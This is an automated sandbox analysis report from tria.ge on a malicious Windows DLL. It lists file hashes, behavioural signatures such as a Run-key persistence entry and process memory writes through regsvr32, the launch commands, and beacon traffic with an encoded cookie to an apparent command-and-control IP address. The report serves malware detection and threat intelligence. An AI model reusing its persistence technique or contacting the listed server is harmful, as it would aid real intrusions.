Windows 7 deprecation
Windows 7 will be removed from tria.ge on 2025-03-31
Analysis
-
max time kernel
52s -
max time network
103s -
platform
windows10-1703_x64 -
resource
win10-20220812-en -
resource tags
arch:x64arch:x86image:win10-20220812-enlocale:en-usos:windows10-1703-x64system -
submitted
02/11/2022, 23:01 UTC
Static task
static1
Behavioral task
behavioral1
Sample
a25157f686cfce09013798a272c14097fa2ddb0ef1d1a5b2fc77c00d7dfc41cb.dll
Resource
win10-20220812-en
5 signatures
150 seconds
General
-
Target
a25157f686cfce09013798a272c14097fa2ddb0ef1d1a5b2fc77c00d7dfc41cb.dll
-
Size
629KB
-
MD5
c9c69f06d8578c13ba70f7ab1f793da7
-
SHA1
d9b3f7517277c896c8733f79f26c3dc7091ad58f
-
SHA256
a25157f686cfce09013798a272c14097fa2ddb0ef1d1a5b2fc77c00d7dfc41cb
-
SHA512
1ba2b828b31d0fd712343fac529f5d82ff4cfce1dffd47ea52c3b58db2e5db28f090f3a597600d255d27127c51232be9999c6a8f38e96d44356a1e510fe8f9d0
-
SSDEEP
12288:6tGis7p49VmD3OjG7QbBtLu5WhNye5JHKVu6cig1Doa:6tGis1T3OjueLhhd5NKAD3
Score
10/10
Malware Config
Signatures
-
Adds Run key to start application 2 TTPs 2 IoCs
description ioc Process Key created \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Run regsvr32.exe Set value (str) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\bxLPxWBKtzwOqdi.dll = "C:\\Windows\\system32\\regsvr32.exe \"C:\\Windows\\system32\\MyNzhzM\\bxLPxWBKtzwOqdi.dll\"" regsvr32.exe -
Suspicious behavior: EnumeratesProcesses 6 IoCs
pid Process 2496 regsvr32.exe 2496 regsvr32.exe 2780 regsvr32.exe 2780 regsvr32.exe 2780 regsvr32.exe 2780 regsvr32.exe -
Suspicious behavior: RenamesItself 1 IoCs
pid Process 2496 regsvr32.exe -
Suspicious use of WriteProcessMemory 2 IoCs
description pid Process procid_target PID 2496 wrote to memory of 2780 2496 regsvr32.exe 66 PID 2496 wrote to memory of 2780 2496 regsvr32.exe 66
Processes
-
C:\Windows\system32\regsvr32.exeregsvr32 /s C:\Users\Admin\AppData\Local\Temp\a25157f686cfce09013798a272c14097fa2ddb0ef1d1a5b2fc77c00d7dfc41cb.dll1⤵
- Suspicious behavior: EnumeratesProcesses
- Suspicious behavior: RenamesItself
- Suspicious use of WriteProcessMemory
PID:2496 -
C:\Windows\system32\regsvr32.exeC:\Windows\system32\regsvr32.exe "C:\Windows\system32\MyNzhzM\bxLPxWBKtzwOqdi.dll"2⤵
- Adds Run key to start application
- Suspicious behavior: EnumeratesProcesses
PID:2780
-
Network
-
Remote address:182.162.143.56:443RequestGET / HTTP/1.1
Connection: Keep-Alive
Cookie: QTBd=BSTjci69ZUIM9QyTgkqxfK5UzzzYgM8fyZhp0TRO/pwD6XJYxD9J+3fJB3kVQeZZOu9MmOMX+u7uuBPwSJ0nYInzaF39AbprHFuE2VCxyNFfj1qoZUpHcI8V0t6jnvDYQUvMOU8Ph0RuNLGEbDFH9Kvph8ZpT3XTWnsi/4ZYmM+tzWLEqg+OTYMjT92y6T14yUlpZyvJuV0kH1p6wgAevpCsraiGwG9nk8BkOuLSoSeSyC1SPBaDl/7Hi42cw7mPk3Qj1AvoOrV10CdpdCrtcaDcyhHDwlTrNv9YEXcwlnlWE8MYaE8SsQLDELpiljkrddXRoQwJfwmUpDzf/7UzgirYbQfqjJU=
Host: 182.162.143.56
ResponseHTTP/1.1 200 OK
Date: Wed, 02 Nov 2022 23:02:23 GMT
Content-Type: text/html; charset=UTF-8
Transfer-Encoding: chunked
Connection: keep-alive
-
322 B 7
-
322 B 7
-
1.2kB 2.7kB 11 10
HTTP Request
GET https://182.162.143.56/HTTP Response
200
No results found